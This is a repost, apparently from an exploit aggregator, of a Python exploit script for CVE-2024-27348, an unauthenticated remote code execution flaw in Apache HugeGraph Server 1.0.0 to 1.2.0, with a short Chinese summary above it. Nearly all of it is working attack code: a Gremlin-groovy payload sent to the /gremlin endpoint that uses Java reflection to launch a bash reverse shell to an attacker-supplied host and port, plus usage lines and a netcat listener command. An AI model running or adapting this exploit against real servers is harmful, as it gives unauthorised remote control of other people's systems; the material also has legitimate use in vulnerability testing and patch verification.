Apache HugeGraph Server 1.2.0 存在未认证远程代码执行漏洞(CVE-2024–27348),允许攻击者通过恶意Gremlin查询注入代码,在目标服务器上执行任意命令并建立反向shell连接。 2025-4-10 21:19:12 Author: cxsecurity.com(查看原文) 阅读量:18 收藏
Apache HugeGraph Server 1.2.0 Remote Code Execution (RCE)# Exploit Title: Apache HugeGraph < 1.2.0 Remote Code Execution (Unauthenticated) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://hugegraph.apache.org/docs/download/download/ # Version: Apache HugeGraph 1.0.0 - 1.2.0 # CVE : CVE-2024–27348 from requests import Request, Session import sys import json def title(): print(''' ______ _______ ____ ___ ____ _ _ ____ _____ _____ _ _ ___ / ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \___ |___ /| || | ( _ ) | | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) | / / |_ \| || |_ / _ \ | |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ / / ___) |__ _| (_) | \____| \_/ |_____| |_____|\___/_____| |_| |_____/_/ |____/ |_| \___/ [+] Reverse shell Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py ''') def exploit(url, lhost, lport): payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}} headers = { 'Content-Type': 'application/json'} s = Session() url = url + "/gremlin" req = Request('POST', url, json=payload, headers=headers) prepped = req.prepare() del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15) print(prepped.headers) print(url) print(resp.headers) print(payload) print(resp.status_code) print(resp.text) if __name__ == '__main__': title() if(len(sys.argv) < 4): print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0])) print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0])) print('[+] Do not forget to run the listener: nc -lvp 4444\n') exit(0) else: exploit(sys.argv[1],sys.argv[2],sys.argv[3])
Thanks for you comment!
|
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
Copyright 2025, cxsecurity.com
如有侵权请联系:admin#unsafe.sh